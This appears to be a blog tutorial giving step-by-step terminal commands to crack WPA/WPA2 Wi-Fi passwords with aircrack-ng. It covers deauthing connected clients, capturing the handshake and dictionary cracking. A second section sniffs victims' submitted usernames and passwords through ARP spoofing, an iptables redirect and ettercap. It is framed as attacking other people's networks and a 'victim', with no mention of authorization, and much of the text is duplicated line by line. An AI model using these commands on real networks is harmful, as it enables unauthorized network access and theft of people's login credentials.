Cracking WPA Wifi, Packet sniffing passwords. – Kali Linux & BackTrack
Cracking WPA WiFi, and Packet sniffing passwords using Kali Linux Operating System and BackTrack Operating System. These both can be useful which has pre-installed tools inside it! All you have to do is open up your terminal and search for any tool usage So, for this tutorial we’ll be using Kali Linux or BackTrack, there is other pentesting operating system as well but Kali Linux Sana 2.0 is pretty good with interface and updates.
This small + simple guide is for those who want to know some basics,
you will need to be on a linux OS for this, Preferably Kali linux or at the least a distro of Back Track, If you don’t have either of those you will need to install the software
you will need to be on a linux OS for this, Preferably Kali linux or at the least a distro of Back Track, If you don’t have either of those you will need to install the software
Install software:
sudo apt-get install aircrack-ng (wpa/2 cracking)
sudo apt-get install ettercap (packet sniffing)
sudo apt-get install aircrack-ng (wpa/2 cracking)
sudo apt-get install ettercap (packet sniffing)
# Anything with a hash (‘#’) we will not type as code, they will just be comments.
# In Terminal/konsole… :
Code:
ifconfig #Displays list of network adaptors.
# You want to get the name of your wireless card, It should be somthing like: wlan0, eth1…
# It is unlikely to be ‘lo, eth0…’ If you do not know what your network card device is named,
# use google to help you find out.
# It is unlikely to be ‘lo, eth0…’ If you do not know what your network card device is named,
# use google to help you find out.
# Command 1:
Code:
airmon-ng start (name of wireless card)
# EG: airmon-ng start wlan0
# You should see something saying “(monitor mode enabled on mon0)”
# If you don’t see that or there is an error (not a warning) then you did something wrong.
# You can check its working by typing ” ifconfig ” again, this time looking for ‘mon0’
# If you have ‘mon0’ you have completed the task above.
# If you don’t see that or there is an error (not a warning) then you did something wrong.
# You can check its working by typing ” ifconfig ” again, this time looking for ‘mon0’
# If you have ‘mon0’ you have completed the task above.
# Command 2:
Code:
airodump-ng -i mon0
# This will present to you a list of all the wireless networks, under ‘ESSID’ you can see the
# Name of the network, It should look something like this:
# Name of the network, It should look something like this:
# 00:11:22:33:44:55 -35 300 200 0 11 54e WPA2 CCMP PSK Wireless_network_ESSID
# You want to make sure the network you are attacking has ‘WPA’ or ‘WPA2′ as that is guide
# only shows you how to crack that encryption type.
# only shows you how to crack that encryption type.
# You then want to copy the BSSID, in this case its ’00:11:22:33:44:55’.
# You also want to keep not of what ‘CH’ (Channel) it is on, in this case its ’11’
# You also want to keep not of what ‘CH’ (Channel) it is on, in this case its ’11’
# Command 3:
Code:
airodump-ng -i mon0 --bssid (BSSID) -c (Channel) -w (any filename)
# EG: airodump-ng -i mon0 –bssid 00:11:22:33:44:55 -c 11 -w capture1 –ignore-negative-one
# Leave this running for a while, for the attack to be successful and for us to proceed…
# There will need to be devices connected to the network that we are attacking.
# We will know if there are ‘clients’ (devices) on this network when a/some entries
# Show up under the ‘STATION’ Heading. Make sure there is also a ‘BSSID’ next to the
# Station. Everything should look something like this:
# There will need to be devices connected to the network that we are attacking.
# We will know if there are ‘clients’ (devices) on this network when a/some entries
# Show up under the ‘STATION’ Heading. Make sure there is also a ‘BSSID’ next to the
# Station. Everything should look something like this:
Code:
# CH 11 ][ Elapsed: 1 mins ][ 2014-02-28 20:20
#
# BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
#
# 00:11:22:33:44:55 -35 100 20 60 30 11 54e WPA2 CCMP PSK Wireless_network_ESSID
#
# BSSID STATION PWR Rate Lost Frames Probe
#
# AA:BB:CC:DD:EE:FF 00:11:22:33:44:55 0 12e-1 0 105 -
# There is no way I can make that all line up because HF removes multiple spaces so deal with it…
# So once you are sure there is a ‘client’ connected to the network we need to de-auth them
# In a new Terminal window (keeping this previous one still open) type:
# In a new Terminal window (keeping this previous one still open) type:
# Command 4:
Code:
aireplay-ng -0 1 -a (BSSID) -c (client's Station) mon0 --ignore-negative-one
# EG: aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c 00:11:22:33:44:55 mon0 –ignore-negative-one
# After executing this command go back to the other Terminal window and check if we captured
# A handshake. At the top next to (Right of) the date/time ie: ‘2014-03-01 12:25’ we will see:
# A handshake. At the top next to (Right of) the date/time ie: ‘2014-03-01 12:25’ we will see:
# 2014-03-01 12:25 ][ WPA handshake: AA:BB:CC:DD:EE:FF
# You may need to repeat Command 4 with different clients (or same) until you get a handshake.
# You can also use Command 4 without specifying the client (‘-c 00:11:22:33:44:55’), by removing
# This part there is still a chance if deauthing a client, but is less likely…
# You can also use Command 4 without specifying the client (‘-c 00:11:22:33:44:55’), by removing
# This part there is still a chance if deauthing a client, but is less likely…
# So now you have captured the WPA handshake we can begin cracking it (decrypting)
# You can stop the ‘airodump-ng’ by pushing ‘ctrl + c’ and turn your aircard off monitor mode
# You can stop the ‘airodump-ng’ by pushing ‘ctrl + c’ and turn your aircard off monitor mode
# Command 5
Code:
airmon-ng stop mon0
# You not no longer actually need to be in the same area as the access point, you can go home if you want.
# For this next step you probably want a strong computer (powerful CPU), If you will just use the same computer
# Thats ok too, if you do decide to use another computer you will need to install ‘aircrack-ng’, this is available on
# any platform…
# Thats ok too, if you do decide to use another computer you will need to install ‘aircrack-ng’, this is available on
# any platform…
# You also are going to need a wordlist and a lot of free time (or able to leave computer running)
# I’d recommend a wordlist from CrackStation
# I commonly use the 247MB (648MB expanded) download, but if you have a good computer and like 42
# hours to spare you can use the 4.2GB (15GB expanded) one.
# I’d recommend a wordlist from CrackStation
# I commonly use the 247MB (648MB expanded) download, but if you have a good computer and like 42
# hours to spare you can use the 4.2GB (15GB expanded) one.
# Command 6:
Code:
aircrack-ng -w (wordlist) -b (bssid) (capture file)
#EG: aircrack-ng -w Downloads/crackstation-human-only.txt -b AA:BB:CC:DD:EE:FF captures/capture1.ivs
# Note: The ‘-b AA:BB:CC:DD:EE:FF’ is optional, if you don’t specify it it will just give you a list to choose
# from, likely to be the only one you attacked. If you did not successfully captured the handshake it will say
# “Got no data packets from target network!”
# from, likely to be the only one you attacked. If you did not successfully captured the handshake it will say
# “Got no data packets from target network!”
# If everything worked you should be presented with something like this:
Code:
# Aircrack-ng 1.2 beta2
# [00:00:05] 205 keys tested (500 k/s)
#
# Current passphrase: potato
#
# Master Key : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#
# Transient Key: 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#
# EAPOL HMAC : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# After letting this run through for freken ages you should see:
Code:
# KEY FOUND! [ password123 ]
# And now you can access the network with the wpa password.
Sniffing passwords: (requires access to the victims network)
#Once connected to the network open up Terminal and type:
# Command 1:
Code:
echo 1> /proc/sys/net/ipv4/ip_forward
# Command 2:
Code:
nano /etc/ettercap/etter.conf
# Hold the down arrow to go down the page untill you see:
Code:
# #------
# # Linux
# #------
# ...
# #If you use iptables:
# #redir_command_on = "iptables -t ....
# #redir_command_of = "iptables -t ....
# Remove the ‘#’ both of the ‘redir_command’, It should look something like this:
Code:
# #If you use iptables:
# redir_command_on = "iptables -t ....
# redir_command_of = "iptables -t ....
# once you’ve done that hit: ‘ctrl + x ‘ then ‘y’ then ‘ENTER’
# Command 3:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# Command 4:
Code:
arpspoof -i (name if aircard) -t (victim-ip) (gateway-ip)
# EG: arpspoof -i wlan0 -t 192.168.1.59 192.168.1.254
# You can find the ip’s of people on the network using ‘nmap’ (a tutorial will not be supplied here)
# While ‘arpspoof’ is running, open another terminal window and run:
# Command 5:
Code:
ettercap -T -q -i (name of aircard) /(victim-ip)/ /(gateway-ip)/
# EG: ettercap -T -q -i wlan0 /192.168.1.59/ /192.168.1.254/
# Done, If the victim navigates to any page and posts any data (like usernames/passwords) to a webpage
# They will be logged here,
# They will be logged here,
# Note this is likely to show a lot of https warnings, and looks kinda suspicious.
# When you are finished sniffing packets… push ‘crtl + c’ in the terminal running ‘arpspoof’ and
# push ‘q’ in the terminal running ‘ettercap’
# push ‘q’ in the terminal running ‘ettercap’
– Tutorial by Iamlegend
No comments: